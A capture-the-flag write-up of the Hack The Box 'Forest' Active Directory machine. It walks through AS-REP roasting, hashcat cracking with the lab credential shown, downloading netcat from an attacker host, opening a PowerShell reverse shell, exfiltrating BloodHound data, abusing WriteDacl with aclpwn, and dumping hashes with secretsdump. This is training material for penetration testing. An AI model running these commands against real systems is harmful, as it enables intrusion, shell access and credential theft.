In this article you well learn the following:
- Scanning targets using nmap.
- Enumerate windows machine
- asreproast attack on valid users
- Cracking krb5asrep hashes with hashcat
- Enumerate active directory vis sharphound
- Show result in bloodhound tool
- Attacking WriteDacl
- Steal users hashes ( LM:NT )
Nmap Scanning:
[box type=”shadow” align=”” class=”” width=””]
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
[/box]
Enumeration:
– I started enumerating users using enum4linux :
enum4linux -a 10.10.10.161
– Then enumerate users using rpcclient :
After enumurating the users, and since kerberos port open, I run GetNPUsers.py script from
impackets suite :
python GetNPUsers.py -dc-ip 10.10.10.161 htb.local/ -usersfile users.txt -outputfile hashes2.txt -format hashcat
I got the hashed password for user svc-alfresco :
To crack this hashed password I used hashcat as following :
hashcat -m 18200 –force -a 0 hashes2.txt rockyou.txt
And I have now valid credentials : svc-alfresco:s3rvice
I run smbmap to see shared folder permissions , nothing interesting.
Then, I connected to the server using evil-winrm with these valid credentials and got user flag:
I started with enumerating active directory, after I got reverse shell and execute powershell.exe
python -m SimpleHTTPServer 80
Invoke-WebRequest -Uri http://10.10.14.42/nc64.exe -OutFile “C:\m4rv3l\nc64.exe”
./nc64.exe 10.10.14.42 9091 -e powershell.exe
Installing SharpHound
Invoke-WebRequest -Uri http://10.10.14.42/SharpHound.ps1 -OutFile “C:\m4rv3l\SharpHound.ps1”
Execute SharpHound:
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -JSONFolder “c:\experiments\bloodhound”
Moving it via nc64:
nc -lvp 9092 > 20200321052509_BloodHound.zip
.\nc64.exe 10.10.14.42 9092 < 20200321052509_BloodHound.zip
NOTE: Run cmd.exe to do that
After getting .zip file from box , I run bloodhound tool and searching for path to administrator:
BloodHound Result Shows Svc-Alfresco can WriteDacl to HTB.local that Contains [email protected]
Good resource to understand attack:
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
Tool :
pip install aclpwn
aclpwn -f svc-alfresco -ft user -d htb.local -s 10.10.10.161
choosing path 0
python secretsdump.py htb.local/svc-alfresco:[email protected]
Then I connect to administrator with nthash via evil-winrm tool , and got root.txt
That’s all folks 😀
